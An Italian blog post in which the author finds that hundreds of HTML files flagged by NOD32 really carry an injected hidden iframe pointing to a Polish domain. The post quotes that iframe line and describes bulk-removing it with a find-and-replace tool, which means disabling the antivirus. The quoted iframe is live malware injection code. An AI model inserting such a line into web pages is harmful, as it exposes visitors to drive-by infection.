Da alcuni mesi il mio antivirus (NOD32, ndP) mi segnala come infetti da virus (Iframe.B.Gen.Virus e Virut.NBP.Virus) tutti i file .html e .htm che ho in un disco.

La cosa mi sembrava parecchio strana, soprattutto perché negli altri PC gli stessi file vengono considerati puliti dallo stesso antivirus. Ed è un bel fastidio vedere qualche centinaio di notifiche ogni volta che apri la cartella Documenti.

Notifiche, peraltro, su cui cliccare sempre “Ignora”, dal momento che l’antivirus non è in gradi di ripulire i file e si limita a cestinarli.

Oggi pomeriggio ho avuto un’illuminazione: perché non provare ad aprire un file html piccolo, tra quelli infetti, e vedere cosa contiene?

Ebbene, l’ultima riga prima di </body> conteneva codice malevolo, ovvero un iframe che puntava ad un indirizzo polacco:

< iframe src="http://jL.chura.pl/rc/" style="display:none" >< /iframe >

È bastato copiancollarlo su Google per scoprire cosa fosse e come liberarsene.

Nonostante la mole di file infettati (5000 nel mio caso) è semplicissimo disinfettare il tutto: basta scaricare il programma Advanced Find And Replace, scegliere il percorso dei file da pulire e dargli in pasto la stringa (quella scritta qui sopra) da sostituire con nulla. Dopo qualche minuto il programma terminerà e tutto sarà fresco e pulito.

Ovviamente è necessario disattivare l’antivirus per poter accedere ai file incriminati.

Morale? Migliaia di falsi positivi, probabilmente non sono poi tanto falsi, e dare un’occhiata un po’ più approfondita non fa mai male.

E mille scuse al NOD antivirus